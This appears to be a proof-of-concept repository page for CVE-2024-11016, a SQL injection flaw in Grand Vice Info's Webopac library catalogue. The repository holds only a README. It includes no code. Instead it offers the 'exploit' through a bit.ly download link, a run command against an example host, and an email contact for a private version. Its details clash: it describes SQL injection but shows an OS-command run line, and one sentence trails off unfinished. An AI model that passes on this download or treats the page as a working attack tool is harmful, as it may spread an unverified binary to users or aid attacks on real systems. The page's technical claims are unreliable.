CVE-2024-11016 PoC — Grand Vice info Webopac SQL注入漏洞

Source

Associated Vulnerability

Description

CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Readme

# CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# Overview
Webopac from Grand Vice info has a SQL Injection vulnerability, allowing unauthenticated remote attacks to inject arbitrary SQL commands to read, modify, and delete database contents.
# Exploit
## [**Download here**](https://bit.ly/40ITgwE) 
## Details 
+ **CVE ID**: CVE-2024-11016
+ **Published**: 11/11/2024
+ **Impact**: Confidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
A vulnerability classified as critical was found in Grand Vice Info Webopac through 6.5.0/7.2.2. An unknown function is affected by this vulnerability. The manipulation of an unknown input leads to a sql injection vulnerability. This has an impact on confidentiality, integrity and availability. The summary of CVE is:
## Affected Versions
Webopac 6, Webopac 7
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-11016.py -h 10.10.10.10 -c 'uname -a'
```
## [**Download here**](https://bit.ly/40ITgwE) 
## Contact
+ **For inquiries, please contact:brahmanskiy@outlook.com**

File Snapshot

 [4.0K]  /data/pocs/2c1be638dd733de45f701bf161af018a191c77c8
└── [1.1K]  README.md

0 directories, 1 file

Remarks